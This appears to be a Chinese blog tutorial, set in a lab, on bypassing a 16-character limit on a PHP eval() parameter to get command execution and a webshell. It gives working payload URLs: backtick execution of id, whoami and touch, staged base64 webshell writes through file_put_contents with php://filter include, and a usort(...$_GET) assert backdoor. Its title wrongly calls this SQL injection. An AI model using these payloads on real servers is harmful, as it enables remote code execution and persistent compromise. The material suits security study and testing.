当前位置：首页 > news >正文

SQL注入之EVAL长度限制突破技巧

news 2025/10/30 1:28:30

要求：

PHP Eval函数参数限制在16个字符的情况下，如何拿到Webshell？

widows小皮环境搭建：

使用phpstudy搭建一个网站。

随后在该eval文件夹下创建一个webshell.php文件，并在其输入代码环境

解题思路：

通过webshell.php的代码中我们可以看到，我们传递的一个param的参数长度小于17位，即长度最多十六位，而且里面不能包含eval和assert，最后eval执行。这就是这段代码的含义。

这个题的难度在于其的长度限制。

我们输入?param=phpinfo();查看页面为php正常。

但我们也就只有输入一个phpinfo();了，但是这只是在Windows下不行了，在Linux下继续接着尝试。

Linux环境搭建：

进入nginx下的html文件夹中创建一个web.php文件下输入代码。

cd /usr/local/nginx/html

vim web.php

:wq保存退出，在/usr/local/nginx/sbin下./nginx启动nginx。

浏览器进入该web.php。

再次解题：

输入?param=phpinfo();测试环境搭建成功。

但是跟解题无关，依然只是个php界面，啥用没有，我们输入?param=·$_GET[1]·&1=id,

id通过反引号执行，因为在Linux下反引号是可以执行命令的。

'$_GET[1]'&1=id,这个代码的意思就是将$_GET[1]中的1的参数放在Linux下执行，实际上执行的就是$_GET[id]，而这17位主要是'$_GET[1]'这个不能突破17位，而后面的1=id随便写多少位都行。

发现没有任何执行显示，这是因为我们执行了但没有输出，只需在前面加上个echo和;即可,?param=echo `$_GET[1]`;&1=id

这就完成了我们的代码执行转换为了命令执行，再转为whoami查看我们的用户是谁。?param=echo `$_GET[1]`;&1=whoami

若是想要执行其他命令例如rm之类的不能执行到，因为权限不够。

比如我们在tmp下创建一个文件，?param=echo `$_GET[1]`;&1=touch /tmp/ceshi123.txt

在Linux中查看，创建成功，用户及权限都是www-data.

以上就是一个突破长度限制的一个内容，算是最简单的一种技巧，接触过第一次后，就很容易的想到这种办法了，当有长度限制的要求时，Windows下的环境一般不会有，因为大部分99%的公司企业环境都用的Linux，而当一看到长度限制只有几位操作空间的时候就可以想到Linux了。

其他技巧：

当然还有另一种稍微难点的技巧。

web.php?1=file_put_contents&param=$_GET[1](N,P,8);

web.php?1=file_put_contents&param=$_GET[1](N,D,8);

继续追加

web.php?1=file_put_contents&param=$_GET[1](N,w,8);

web.php?param=include$_GET[1];&1=php://filter/read=convert.b ase64-decode/resource=N

这里向param传入的$_GET[1]，这个GET[1]接受的参数是file_put_contents，实际GET[1]中写的就是file_put_contents，这个file_put_contents里传了三个参数，N、P、8，N是我们要写的文件名，也就是我们要写进这个文件里去，P是我们一句话木马的一个base64编码，8代表着追加。我们输入web.php?1=file_put_contents&param=$_GET[1](N,P,8);后在Linux中的查看会发现多了一个N的文件，N文件中内容为P，再执行一个web.php?1=file_put_contents&param=$_GET[1](N,D,8);这其实就是将base64编码一个一个往N里面追加。但是在官方文档中这个8是FILE_APPEND，这样就超出长度限制了，根本用不了，8是因为php底层C语言代码中file_put_content函数中的追加是8，所以这里写的8而不是php官方文档中写的FILE_APPEND。这里就是写8的原因而不是写的其他。这里追加的是base64编码而不是其他编码是因为有些特殊字符在file_append中追加不了，比如^？等追加不了。读取是通过php的尾协议用base64-decode解码成一个正常的语句文件包含进去的N里面是可以识别的一句话木马。前提就是得一个一个追加完成后进行一个解码执行。

还有一个web.php?1[]=test&1[]=phpinfo();&2=assert。加上一个usort(...$_GET);即PHP5.6+变长参数 ⇒ usort回调后门 ⇒ 任意代码执行，前提是要进行一个抓包，这里使用的是burpsuite抓包。

抓包结果如下。

对开头得GET修改为POST末尾追加param=usort(...$_GET);加;是因为要传入eval中得，这里usort(...$_GET);一共16位没有超过17位。

这里php5.6可以接收...GET变长参数，usort的回调后门去执行。

然后在action中send to repeater后在repeater中send就可以在旁边看到了。

以上三个方法就是EVAL长度限制突破技巧的一小部分技巧了。

SQL注入之EVAL长度限制突破技巧

要求：

widows小皮环境搭建：

解题思路：

Linux环境搭建：

再次解题：

其他技巧：

相关文章：

SQL注入之EVAL长度限制突破技巧

稀疏注意力：时间序列预测的局部性和Transformer的存储瓶颈

详谈系统中的环境变量

RAG与LLM原理及实践（11）--- Milvus hybrid search 源码分析及思想

JavaScript模拟空调效果

14.2 Pandas数据处理

python学习7---多进程

基于Spring + Vue的旅游景区项目+源代码+文档说明

Java后端面试题

【Git】远程仓库新建分支后，拉到本地开发

React H5设置企业级v6版本路由的配置

【微信小程序】全局配置

25届秋招网络安全面试资料库

Adobe Dimension DN v4.0.2 解锁版下载安装教程 (专业的三维3D建模工具)

Python中*args 和 **kwargs作参数时有什么区别

[CSS3]2D与3D变换技术详解

大恒相机通过Line2或Line3直接给出3.3V触发，形成分时曝光

electronjs实现打开的网页密码自动保存

观测云的自动化监控：CRD 资源与自动发现

九、OpenCVSharp 中的图像形态学操作

使用分级同态加密防御梯度泄漏

spring：实例工厂方法获取bean

linux 下常用变更-8

JVM暂停（Stop-The-World，STW）的原因分类及对应排查方案

Unity | AmplifyShaderEditor插件基础（第七集：平面波动shader）

Hive 存储格式深度解析：从 TextFile 到 ORC，如何选对数据存储方案？

JAVA后端开发——多租户

STM32---外部32.768K晶振（LSE）无法起振问题

探索Selenium：自动化测试的神奇钥匙

Rust 开发环境搭建